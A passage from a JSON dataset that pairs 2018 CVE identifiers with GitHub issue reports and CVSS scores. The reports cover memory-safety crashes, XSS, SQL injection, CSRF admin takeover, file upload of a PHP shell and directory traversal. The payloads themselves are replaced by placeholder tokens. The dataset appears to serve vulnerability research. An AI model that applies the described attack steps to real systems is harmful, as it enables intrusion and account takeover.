        "description": "Heap buffer overflow in OP_ENTER. The following input demonstrates a crash: CODETAG This issue looks similar to NUMBERTAG ASAN report: ERRORTAG This issue was reported by Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto and Tigist Abera ( URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12249",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/4037",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/4037",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2018-06-05T19:26:59Z",
        "description": "Null pointer dereference in mrb_class_real. The following input demonstrates a crash: APITAG ASAN report: ERRORTAG This issue was reported by Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto and Tigist Abera ( URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12263",
        "Issue_Url_old": "https://github.com/oyeahtime/test/issues/3",
        "Issue_Url_new": "https://github.com/oyeahtime/test/issues/3",
        "Repo_new": "oyeahtime/test",
        "Issue_Created_At": "2018-06-12T06:48:13Z",
        "description": "APITAG file upload. APITAG is free open source file with PHP. There is a SQL injection vulnerability in the portfoliocms We can get the source code : URLTAG file upload poc: URLTAG we can upload a php shell FILETAG connect the shell FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12264",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/366",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/366",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-06-11T11:33:59Z",
        "description": "out of bound read in function std::memcpy (tmp, buf, len) in PATHTAG PATHTAG ./exi NUMBERTAG ep NUMBERTAG out of read Poc Warning: Directory Image, entry NUMBERTAG Strip NUMBERTAG is outside of the data area; ignored. Segmentation fault (core dumped) PATHTAG gdb q exi NUMBERTAG APITAG Reading symbols from APITAG APITAG LWP NUMBERTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Core was generated by `./exi NUMBERTAG ep NUMBERTAG out of read Poc'. Program terminated with signal SIGSEGV, Segmentation fault NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG PATHTAG No such file or directory. gdb peda$ bt NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG fe NUMBERTAG af NUMBERTAG in APITAG APITAG (this NUMBERTAG e NUMBERTAG c NUMBERTAG buf NUMBERTAG fe NUMBERTAG c3ff7 <error: Cannot access memory at address NUMBERTAG fe NUMBERTAG c3ff7>, len NUMBERTAG at PATHTAG NUMBERTAG fe NUMBERTAG e0c1 in (anonymous APITAG (this NUMBERTAG e NUMBERTAG at PATHTAG NUMBERTAG fe NUMBERTAG a in APITAG (this NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG e0ec NUMBERTAG at PATHTAG NUMBERTAG b6 in APITAG (this NUMBERTAG e0ec NUMBERTAG path NUMBERTAG out of read Poc\") at PATHTAG NUMBERTAG cd in main (argc NUMBERTAG arg NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG at PATHTAG NUMBERTAG fe NUMBERTAG in __libc_start_main (main NUMBERTAG main(int, char const )>, argc NUMBERTAG arg NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG ffc NUMBERTAG e9c NUMBERTAG at PATHTAG NUMBERTAG in _start () Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12265",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/365",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/365",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-06-11T09:50:59Z",
        "description": "out of bound read when extract preview images from Poc file . PATHTAG ./exi NUMBERTAG ep1 PATHTAG Error: Upper boundary of data for directory Image, entry NUMBERTAG fe is out of bounds: Offset NUMBERTAG a, size NUMBERTAG exceeds buffer size by NUMBERTAG Bytes; truncating the entry Warning: Directory Image, entry NUMBERTAG Strip NUMBERTAG is outside of the data area; ignored. Warning: Directory Image, entry NUMBERTAG Strip NUMBERTAG is outside of the data area; ignored. Error: Offset of directory Thumbnail, entry NUMBERTAG is out of bounds: Offset NUMBERTAG truncating the entry Segmentation fault (core dumped) PATHTAG gdb q exi NUMBERTAG APITAG Reading symbols from APITAG New LWP NUMBERTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Core was generated by `./exi NUMBERTAG ep1 APITAG NUMBERTAG Program terminated with signal SIGSEGV, Segmentation fault NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG PATHTAG No such file or directory. gdb peda$ bt NUMBERTAG memcpy_avx_unaligned () at PATHTAG NUMBERTAG f NUMBERTAG ccde NUMBERTAG in APITAG (this NUMBERTAG buf NUMBERTAG ffda NUMBERTAG e NUMBERTAG h8,pos NUMBERTAG rcount NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce NUMBERTAG f NUMBERTAG in APITAG APITAG advance NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce2cc NUMBERTAG in APITAG (io=...) at PATHTAG NUMBERTAG f NUMBERTAG cce2c9b7 in APITAG (data NUMBERTAG f NUMBERTAG cd4b7fff <error: Cannot access memory at address NUMBERTAG f NUMBERTAG cd4b7fff>, size NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce NUMBERTAG in (anonymous APITAG (this NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cce NUMBERTAG b8 in APITAG (this NUMBERTAG ffda NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG ccb0) at PATHTAG NUMBERTAG b6 in APITAG (this NUMBERTAG ccb0, APITAG NUMBERTAG at PATHTAG NUMBERTAG cd in main (argc NUMBERTAG arg NUMBERTAG ffda NUMBERTAG at PATHTAG NUMBERTAG f NUMBERTAG cc2f NUMBERTAG in __libc_start_main (main NUMBERTAG main(int, char const )>, argc NUMBERTAG arg NUMBERTAG ffda NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG ffda NUMBERTAG at PATHTAG NUMBERTAG in _start () APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12272",
        "Issue_Url_old": "https://github.com/XIMDEX/ximdex/issues/148",
        "Issue_Url_new": "https://github.com/ximdex/xcms/issues/148",
        "Repo_new": "ximdex/xcms",
        "Issue_Created_At": "2018-06-12T02:28:07Z",
        "description": "XSS in parameter content . vulnerability url: FILETAG parameter content payload: APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12273",
        "Issue_Url_old": "https://github.com/XIMDEX/ximdex/issues/149",
        "Issue_Url_new": "https://github.com/ximdex/xcms/issues/149",
        "Repo_new": "ximdex/xcms",
        "Issue_Created_At": "2018-06-12T03:06:45Z",
        "description": "xss vulnerability in two parameters in DMS Demo. vulnerability url: URLTAG two parameters: Ciudad APITAG Nombre APITAG result: FILETAG Author: zhihua. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12320",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/10293",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10293",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-06-08T13:10:06Z",
        "description": "Use after free in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Java Class | Architecture/bits of the file (mandatory) | N/A | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG e NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior UAF in ASAN build. Steps to reproduce the behavior Download URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-12321",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/10296",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10296",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-06-08T13:17:31Z",
        "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Java Class | Architecture/bits of the file (mandatory) | N/A | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG e NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-12322",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/10294",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10294",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-06-08T13:13:27Z",
        "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | iNES ROM dump | Architecture/bits of the file (mandatory) | NES | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG e NUMBERTAG a commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-12339",
        "Issue_Url_old": "https://github.com/woider/ArticleCMS/issues/4",
        "Issue_Url_new": "https://github.com/woider/articlecms/issues/4",
        "Repo_new": "woider/articlecms",
        "Issue_Created_At": "2018-06-13T17:10:13Z",
        "description": "There have XSS vulnerability that can excute javascript. sign up and select \"add an article\", Insert the payload \" APITAG alert NUMBERTAG APITAG \" in the title and submit. open index line NUMBERTAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-12421",
        "Issue_Url_old": "https://github.com/ltb-project/self-service-password/issues/211",
        "Issue_Url_new": "https://github.com/ltb-project/self-service-password/issues/211",
        "Repo_new": "ltb-project/self-service-password",
        "Issue_Created_At": "2018-06-14T05:32:40Z",
        "description": "Force string conversion of input values. To avoid attacks with input values (using arrays or another PHP object), we should force string conversion.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12421",
        "Issue_Url_old": "https://github.com/ltb-project/self-service-password/issues/209",
        "Issue_Url_new": "https://github.com/ltb-project/self-service-password/issues/209",
        "Repo_new": "ltb-project/self-service-password",
        "Issue_Created_At": "2018-06-13T15:42:07Z",
        "description": "Check ldap_bind return code instead of relying on ldap_errno. As it can be seen in the issue open on APITAG the ldap_errno is not filled if there was an error when calling ldap_bind: CVETAG We have a PR NUMBERTAG that is workaround by checking that parameters are strings, but this does not prevent another ldap_bind error. We need to check ldap_bind return code before looking at ldap_errno.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12423",
        "Issue_Url_old": "https://github.com/matrix-org/matrix-doc/issues/1304",
        "Issue_Url_new": "https://github.com/matrix-org/matrix-spec-proposals/issues/1304",
        "Repo_new": "matrix-org/matrix-spec-proposals",
        "Issue_Created_At": "2018-06-14T09:12:44Z",
        "description": "Proposal to simplify the auth rules of m. APITAG events.. Documentation: URLTAG Author: MENTIONTAG MENTIONTAG Date NUMBERTAG Fixes URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12447",
        "Issue_Url_old": "https://github.com/ebel34/bpg-web-encoder/issues/2",
        "Issue_Url_new": "https://github.com/ebel34/bpg-web-encoder/issues/2",
        "Repo_new": "ebel34/bpg-web-encoder",
        "Issue_Created_At": "2018-06-15T03:13:29Z",
        "description": "an heapoverflow bug which could lead to execute code in libbpg. an heapoverflow bug which could lead to execute code in libbpg interger overflow at APITAG CODETAG after adding a negative number the src will be somewhere before the mmaped area, therefore we can write anything before the mmaped area, there are libc before it, so if we can designed the added value, we can gain a code execution. summary: interger overflow at the function restore_tqb_pixels of hevc_filter.c execute method: ./bpgdec poc o /dev/null asan URLTAG poc URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12493",
        "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/12",
        "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/12",
        "Repo_new": "sanluan/publiccms",
        "Issue_Created_At": "2018-06-15T02:34:32Z",
        "description": "There is a APITAG Traversal\" and APITAG file read\" vulnerability that can read system dir and file. First you should login demo account, Directory Traversal POC: CODETAG Arbitrary file read POC: CODETAG You can use these two poc brower system dir and read any file~",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12498",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/26",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/26",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-06-14T08:09:18Z",
        "description": "ICMS NUMBERTAG have a SQLi in FILETAG . POC: APITAG POST: APITAG and APITAG Vulnerability file: PATHTAG ERRORTAG iCMS MENTIONTAG set poid APITAG id CODETAG iCMS MENTIONTAG set rid APITAG id CODETAG iCMS MENTIONTAG set cid APITAG id APITAG iCMS MENTIONTAG where id APITAG iCMS MENTIONTAG where id APITAG iCMS MENTIONTAG where id APITAG iCMS MENTIONTAG where id CODETAG The $id parameter is brought into SQL execution without any filtering, resulting in SQL injection.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12537",
        "Issue_Url_old": "https://github.com/eclipse/vert.x/issues/2470",
        "Issue_Url_new": "https://github.com/eclipse-vertx/vert.x/issues/2470",
        "Repo_new": "eclipse-vertx/vert.x",
        "Issue_Created_At": "2018-05-23T10:31:39Z",
        "description": "Http header validation. motivation Currently APITAG and APITAG don't check wether header name or value contain APITAG or APITAG chars. Of course developers are fully responsible for http headers set and such incorrect value is likely unintended. Forbidding it prevents HTTP header injection for application that omit to check headers. change throw an ERRORTAG when a header name or value contains APITAG or APITAG char",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12541",
        "Issue_Url_old": "https://github.com/eclipse-vertx/vert.x/issues/2648",
        "Issue_Url_new": "https://github.com/eclipse-vertx/vert.x/issues/2648",
        "Repo_new": "eclipse-vertx/vert.x",
        "Issue_Created_At": "2018-10-03T07:02:03Z",
        "description": "APITAG upgrade request body limit. CVETAG : The APITAG HTTP upgrade implementation buffers the full http request before doing the handshake, holding the entire request body in memory. There should be a reasonnable limit NUMBERTAG bytes) above which the APITAG gets an HTTP response with the NUMBERTAG status code and the connection gets closed.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12542",
        "Issue_Url_old": "https://github.com/vert-x3/vertx-web/issues/1025",
        "Issue_Url_new": "https://github.com/vert-x3/vertx-web/issues/1025",
        "Repo_new": "vert-x3/vertx-web",
        "Issue_Created_At": "2018-10-03T07:06:09Z",
        "description": "Neutralize property backward slashes sequences in APITAG CVETAG : The APITAG uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize ' (backward slashes) sequences that can resolve to a location that is outside of that directory when running on Windows Operating Systems. This was reported by Vishwanath Viraktamath < EMAILTAG >",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12544",
        "Issue_Url_old": "https://github.com/vert-x3/vertx-web/issues/1021",
        "Issue_Url_new": "https://github.com/vert-x3/vertx-web/issues/1021",
        "Repo_new": "vert-x3/vertx-web",
        "Issue_Created_At": "2018-09-27T12:55:43Z",
        "description": "Potential XXE vulnerability in vertx web. Version vert.x web: APITAG Mitigation Follow the OWASP guide below which provides concise information to prevent this vulnerability. URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12578",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/39",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/39",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2018-06-19T11:47:25Z",
        "description": "heap buffer overflow in bmp_compress1_row. Description of problem: There is a heap buffer overflow in bmp_compress1_row. Version Release number of selected component (if applicable): <= latest version The output information is as follows: CODETAG The gdb debugging information is listed below:(with asan) ERRORTAG that is a breif description\uff0ci will update found by pwd MENTIONTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12582",
        "Issue_Url_old": "https://github.com/p8w/akcms/issues/1",
        "Issue_Url_new": "https://github.com/git-hash/akcms/issues/1",
        "Repo_new": "git-hash/akcms",
        "Issue_Created_At": "2018-06-25T15:07:50Z",
        "description": "CSRF that can add an admin by submiting this form.. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12583",
        "Issue_Url_old": "https://github.com/p8w/akcms/issues/2",
        "Issue_Url_new": "https://github.com/git-hash/akcms/issues/2",
        "Repo_new": "git-hash/akcms",
        "Issue_Created_At": "2018-06-25T15:13:58Z",
        "description": "CSRF that can delete article if user click 'submit'.. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12588",
        "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/3805",
        "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/3805",
        "Repo_new": "pkp/pkp-lib",
        "Issue_Created_At": "2018-06-18T16:02:58Z",
        "description": "Correct missing escaping in APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12599",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1177",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1177",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-06-19T13:39:47Z",
        "description": "out of bounds write in bmp.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description CODETAG Steps to Reproduce In coders/bmp.c ERRORTAG (image >rows y NUMBERTAG bytes_per_line may be much larger than APITAG will cause an out of bounds write bug in line NUMBERTAG of coders/bmp.c To reproduce this problem: ERRORTAG Debugging information\uff1a ERRORTAG POC FILETAG System Configuration APITAG APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on):ubuntu NUMBERTAG Additional information: Credit: Zongming Wang from Chengdu Security Response Center of Qihoo NUMBERTAG Technology Co. Ltd.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12601",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/41",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/41",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2018-06-20T07:30:42Z",
        "description": "heap buffer overflow in function APITAG Description of problem: There is a heap buffer overflow in function APITAG input tga.ci line NUMBERTAG from debug info) Version Release number of selected component (if applicable): sam2p NUMBERTAG The output information is as follows(with asan): ERRORTAG that is a breif description\uff0ci will update found by APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12604",
        "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/110",
        "Issue_Url_new": "https://github.com/greencms/greencms/issues/110",
        "Repo_new": "greencms/greencms",
        "Issue_Created_At": "2018-06-20T09:19:06Z",
        "description": "APITAG \u6f0f\u6d1e\u53d1\u73b0\u8005\uff1avr_system \u6076\u610f\u653b\u51fb\u8005\u53ef\u4ee5\u4e0b\u8f7d\u7f51\u7ad9\u5168\u90e8\u65e5\u5fd7\u3002 \u6d4b\u8bd5\u5730\u5740\uff1a FILETAG \u6848\u4f8b\u5730\u5740\uff1a FILETAG PATHTAG \u53ea\u9700\u8981\u5c1d\u8bd5\u731c\u6d4b\u65e5\u5fd7\u7684\u65e5\u671f\uff0c\u5c31\u80fd\u591f\u4e0b\u8f7d\u5168\u90e8\u65e5\u5fd7\u3002 \u9632\u5fa1\u65b9\u6cd5\uff1a\u52a0\u5f3a\u65e5\u5fd7\u540d\u79f0\u7684\u590d\u6742\u7a0b\u5ea6\u3002",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12655",
        "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/99",
        "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/99",
        "Repo_new": "slims/slims8_akasia",
        "Issue_Created_At": "2018-06-21T03:44:53Z",
        "description": "FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12656",
        "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/100",
        "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/100",
        "Repo_new": "slims/slims8_akasia",
        "Issue_Created_At": "2018-06-21T03:49:12Z",
        "description": "FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12657",
        "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/101",
        "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/101",
        "Repo_new": "slims/slims8_akasia",
        "Issue_Created_At": "2018-06-21T03:56:19Z",
        "description": "FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12658",
        "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/102",
        "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/102",
        "Repo_new": "slims/slims8_akasia",
        "Issue_Created_At": "2018-06-21T04:00:28Z",
        "description": "FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12659",
        "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/103",
        "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/103",
        "Repo_new": "slims/slims8_akasia",
        "Issue_Created_At": "2018-06-21T04:28:03Z",
        "description": "FILETAG NUMBERTAG Namun sayangnya tidak ada pengecekan pada sisi server side untuk mengecek keberadaan parameter csrf_token. Sehingga dapat dibuat exploit sebagai berikut ERRORTAG NUMBERTAG Simpan script exploit diatas sebagai html file NUMBERTAG Kirimkan FILETAG kepada korban yang sedang login pada slims miliknya. FILETAG NUMBERTAG Berikut ini merupakan respon dari hasil perubahan data admin. FILETAG NUMBERTAG Setelah berhasil, attacker dapat mengambil alih akun tersebut dengan login ke sistem slims korban menggunakan username : admin password : faisal",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12679",
        "Issue_Url_old": "https://github.com/Tanganelli/CoAPthon3/issues/16",
        "Issue_Url_new": "https://github.com/tanganelli/coapthon3/issues/16",
        "Repo_new": "tanganelli/coapthon3",
        "Issue_Created_At": "2018-12-27T14:18:24Z",
